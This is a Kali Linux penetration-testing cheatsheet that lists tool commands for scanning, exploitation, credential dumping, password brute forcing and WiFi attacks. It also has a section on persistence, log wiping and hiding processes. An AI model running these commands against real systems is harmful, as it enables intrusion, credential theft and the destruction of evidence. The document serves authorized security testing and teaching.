Kali Linux Cheatsheet

Kali Linux is a Debian-based Linux distribution specifically designed for digital forensics and penetration testing. Developed and maintained by Offensive Security, Kali Linux comes pre-installed with over 600 penetration testing tools, making it the go-to platform for cybersecurity professionals, ethical hackers, and security researchers worldwide.

Installation and Setup

Download and Installation

# Download Kali Linux ISO
wget https://cdimage.kali.org/kali-2024.1/kali-linux-2024.1-installer-amd64.iso

# Verify checksum
sha256sum kali-linux-2024.1-installer-amd64.iso

# Create bootable USB (Linux)
sudo dd if=kali-linux-2024.1-installer-amd64.iso of=/dev/sdX bs=4M status=progress

# Create bootable USB (Windows - use Rufus or similar tool)
# Use Rufus, Etcher, or Win32DiskImager

Virtual Machine Setup

# VMware recommended settings
# RAM: 4GB minimum, 8GB recommended
# Storage: 80GB minimum
# Network: NAT or Bridged

# VirtualBox recommended settings
# RAM: 4GB minimum, 8GB recommended  
# Storage: 80GB minimum, VDI format
# Network: NAT or Bridged
# Enable VT-x/AMD-V virtualization

Initial Configuration

# Update system
sudo apt update && sudo apt upgrade -y

# Install additional tools
sudo apt install -y kali-linux-large

# Configure non-root user (recommended)
sudo useradd -m -s /bin/bash username
sudo usermod -aG sudo username
sudo passwd username

# Enable SSH (if needed)
sudo systemctl enable ssh
sudo systemctl start ssh

# Configure firewall
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing

Essential Tools and Commands

Information Gathering

# Nmap - Network scanning
nmap -sS -sV -O target_ip
nmap -sC -sV -oA scan_results target_ip
nmap --script vuln target_ip

# Masscan - Fast port scanner
masscan -p1-65535 target_ip --rate=1000

# Dmitry - Information gathering
dmitry -winsepo output.txt target.com

# theHarvester - Email and subdomain gathering
theHarvester -d target.com -l 500 -b google

# Recon-ng - Web reconnaissance framework
recon-ng
[recon-ng][default] > workspaces create target_workspace
[recon-ng][target_workspace] > modules load recon/domains-hosts/google_site_web

Vulnerability Assessment

# OpenVAS - Vulnerability scanner
sudo gvm-setup
sudo gvm-start
sudo gvm-feed-update

# Nikto - Web vulnerability scanner
nikto -h http://target.com
nikto -h http://target.com -o nikto_results.txt

# Dirb - Directory brute forcer
dirb http://target.com
dirb http://target.com /usr/share/dirb/wordlists/big.txt

# Gobuster - Directory/file brute forcer
gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dns -d target.com -w /usr/share/wordlists/dnsmap.txt

# WPScan - WordPress vulnerability scanner
wpscan --url http://target.com --enumerate u,p,t
wpscan --url http://target.com --passwords /usr/share/wordlists/rockyou.txt

Web Application Testing

# Burp Suite - Web application security testing
burpsuite &

# OWASP ZAP - Web application scanner
zaproxy &

# SQLmap - SQL injection testing
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump

# Commix - Command injection testing
commix --url="http://target.com/page.php?id=1"

# XSSer - Cross-site scripting testing
xsser --url "http://target.com/search.php?q=XSS" --auto

Exploitation

# Metasploit Framework
msfconsole
msf6 > search type:exploit platform:windows
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS target_ip
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

# Searchsploit - Exploit database search
searchsploit apache 2.4
searchsploit -m 12345.py

# Social Engineering Toolkit
setoolkit
# Select from menu options for phishing, credential harvesting, etc.

# BeEF - Browser exploitation framework
beef-xss
# Access web interface at http://127.0.0.1:3000/ui/panel

Post-Exploitation

# Meterpreter commands (within Metasploit session)
meterpreter > sysinfo
meterpreter > getuid
meterpreter > ps
meterpreter > migrate PID
meterpreter > hashdump
meterpreter > screenshot
meterpreter > download C:\\file.txt /tmp/
meterpreter > upload /tmp/file.txt C:\\

# Empire - PowerShell post-exploitation
powershell-empire server
powershell-empire client

# Mimikatz - Credential extraction
mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam

Password Attacks

# John the Ripper - Password cracking
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt

# Hashcat - Advanced password recovery
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a

# Hydra - Network login cracker
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target_ip
hydra -L users.txt -P passwords.txt ftp://target_ip
hydra -l admin -P /usr/share/wordlists/rockyou.txt target_ip http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"

# Medusa - Parallel login brute forcer
medusa -h target_ip -u admin -P /usr/share/wordlists/rockyou.txt -M ssh
medusa -H hosts.txt -U users.txt -P passwords.txt -M ftp

# Crunch - Wordlist generator
crunch 8 8 -t ,@@@@@@@ -o wordlist.txt
crunch 6 10 abcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt

Wireless Security

# Aircrack-ng suite - WiFi security testing
# Monitor mode
airmon-ng start wlan0

# Capture packets
airodump-ng wlan0mon

# Capture specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack WPA/WPA2
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Reaver - WPS attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

# Wifite - Automated wireless attack
wifite --wpa --dict /usr/share/wordlists/rockyou.txt

Digital Forensics

# Autopsy - Digital forensics platform
autopsy &

# Volatility - Memory analysis
volatility -f memory.dump imageinfo
volatility -f memory.dump --profile=Win7SP1x64 pslist
volatility -f memory.dump --profile=Win7SP1x64 netscan
volatility -f memory.dump --profile=Win7SP1x64 malfind

# Binwalk - Firmware analysis
binwalk firmware.bin
binwalk -e firmware.bin

# Foremost - File carving
foremost -i disk_image.dd -o recovered_files/

# Sleuth Kit - File system analysis
fls -r disk_image.dd
icat disk_image.dd inode_number > recovered_file

Reverse Engineering

# Ghidra - NSA reverse engineering tool
ghidra &

# Radare2 - Reverse engineering framework
r2 binary_file
[0x00000000]> aaa
[0x00000000]> pdf @main

# GDB - GNU Debugger
gdb binary_file
(gdb) run
(gdb) break main
(gdb) continue
(gdb) info registers

# Strings - Extract strings from binaries
strings binary_file
strings -n 10 binary_file | grep -i password

# Hexdump - Hex viewer
hexdump -C binary_file | head -20
xxd binary_file | head -20

System Administration

Package Management

# Update package lists
sudo apt update

# Upgrade all packages
sudo apt upgrade -y

# Install specific tools
sudo apt install -y tool_name

# Install Kali metapackages
sudo apt install -y kali-linux-large
sudo apt install -y kali-linux-everything
sudo apt install -y kali-tools-top10

# Search for packages
apt search keyword
apt show package_name

# Remove packages
sudo apt remove package_name
sudo apt purge package_name
sudo apt autoremove

Service Management

# Systemctl commands
sudo systemctl start service_name
sudo systemctl stop service_name
sudo systemctl restart service_name
sudo systemctl enable service_name
sudo systemctl disable service_name
sudo systemctl status service_name

# Common services
sudo systemctl start ssh
sudo systemctl start apache2
sudo systemctl start postgresql
sudo systemctl start mysql

# Check listening ports
netstat -tlnp
ss -tlnp

Network Configuration

# Interface configuration
ip addr show
ip link set eth0 up
ip link set eth0 down

# Static IP configuration
sudo nano /etc/network/interfaces
# Add:
# auto eth0
# iface eth0 inet static
# address 192.168.1.100
# netmask 255.255.255.0
# gateway 192.168.1.1

# DNS configuration
sudo nano /etc/resolv.conf
# Add:
# nameserver 8.8.8.8
# nameserver 8.8.4.4

# Restart networking
sudo systemctl restart networking

User Management

# Add user
sudo useradd -m -s /bin/bash username
sudo passwd username

# Add user to groups
sudo usermod -aG sudo username
sudo usermod -aG adm username

# Switch user
su - username
sudo -u username command

# View user information
id username
groups username
finger username

# Lock/unlock user
sudo usermod -L username
sudo usermod -U username

Advanced Techniques

Custom Tool Installation

# Install from source
git clone https://github.com/tool/repository.git
cd repository
make && sudo make install

# Python tools
pip3 install tool_name
pip3 install -r requirements.txt

# Go tools
go install github.com/tool/repository@latest

# Ruby gems
gem install tool_name

# Manual installation
wget https://example.com/tool.tar.gz
tar -xzf tool.tar.gz
cd tool
./configure && make && sudo make install

Environment Customization

# Bash aliases
nano ~/.bashrc
# Add useful aliases:
alias ll='ls -la'
alias la='ls -A'
alias l='ls -CF'
alias ..='cd ..'
alias ...='cd ../..'
alias grep='grep --color=auto'
alias nmap='nmap --reason --open --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit'

# Custom functions
function extract() {
    if [ -f $1 ] ; then
        case $1 in
            *.tar.bz2)   tar xjf $1     ;;
            *.tar.gz)    tar xzf $1     ;;
            *.bz2)       bunzip2 $1     ;;
            *.rar)       unrar e $1     ;;
            *.gz)        gunzip $1      ;;
            *.tar)       tar xf $1      ;;
            *.tbz2)      tar xjf $1     ;;
            *.tgz)       tar xzf $1     ;;
            *.zip)       unzip $1       ;;
            *.Z)         uncompress $1  ;;
            *.7z)        7z x $1        ;;
            *)     echo "'$1' cannot be extracted via extract()" ;;
        esac
    else
        echo "'$1' is not a valid file"
    fi
}

# Source the changes
source ~/.bashrc

Automation Scripts

# Basic reconnaissance script
#!/bin/bash
TARGET=$1
if [ -z "$TARGET" ]; then
    echo "Usage: $0 <target>"
    exit 1
fi

echo "Starting reconnaissance on $TARGET"
mkdir -p results/$TARGET

# Nmap scan
echo "Running Nmap scan..."
nmap -sS -sV -sC -O -oA results/$TARGET/nmap_scan $TARGET

# Directory enumeration
echo "Running directory enumeration..."
gobuster dir -u http://$TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o results/$TARGET/gobuster.txt

# Nikto scan
echo "Running Nikto scan..."
nikto -h http://$TARGET -o results/$TARGET/nikto.txt

echo "Reconnaissance complete. Results saved in results/$TARGET/"

Persistence and Stealth

# SSH key persistence
ssh-keygen -t rsa -b 4096
ssh-copy-id user@target_ip

# Cron job persistence
crontab -e
# Add: @reboot /path/to/script.sh

# Service persistence
sudo nano /etc/systemd/system/custom.service
# Create service file for persistence

# Log cleaning
sudo truncate -s 0 /var/log/auth.log
sudo truncate -s 0 /var/log/syslog
history -c && history -w

# Process hiding
nohup ./malicious_binary > /dev/null 2>&1 &
disown

Troubleshooting

Common Issues

# WiFi adapter not working
sudo airmon-ng check kill
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

# VirtualBox guest additions
sudo apt install -y virtualbox-guest-x11
sudo VBoxClient --clipboard
sudo VBoxClient --draganddrop

# Graphics issues
sudo apt install -y kali-desktop-xfce
sudo dpkg-reconfigure lightdm

# Sound issues
sudo apt install -y pulseaudio
pulseaudio --start

# Network issues
sudo dhclient eth0
sudo systemctl restart networking
sudo systemctl restart NetworkManager

Performance Optimization

# Disable unnecessary services
sudo systemctl disable bluetooth
sudo systemctl disable cups
sudo systemctl disable avahi-daemon

# Clean system
sudo apt autoremove
sudo apt autoclean
sudo apt clean

# Monitor resources
htop
iotop
nethogs
iftop

# Optimize for VMs
sudo apt install -y open-vm-tools
sudo apt install -y virtualbox-guest-utils

Security Best Practices

Operational Security

# Use VPN for testing
sudo openvpn config.ovpn

# Proxy chains configuration
sudo nano /etc/proxychains.conf
proxychains nmap target_ip

# Tor usage
sudo systemctl start tor
proxychains firefox

# MAC address randomization
sudo macchanger -r wlan0
sudo macchanger -m 00:11:22:33:44:55 wlan0

# Secure deletion
shred -vfz -n 3 sensitive_file
wipe -rf directory/

Legal and Ethical Considerations

# Always obtain proper authorization
# Document scope and limitations
# Follow responsible disclosure
# Maintain confidentiality
# Respect privacy and data protection laws

# Create engagement documentation
echo "Penetration Test Authorization" > authorization.txt
echo "Client: Company Name" >> authorization.txt
echo "Scope: IP ranges, domains" >> authorization.txt
echo "Date: $(date)" >> authorization.txt
echo "Tester: Your Name" >> authorization.txt

Resources

• Kali Linux Official Documentation
• Offensive Security Training
• Kali Linux Tools
• Penetration Testing Execution Standard
• OWASP Testing Guide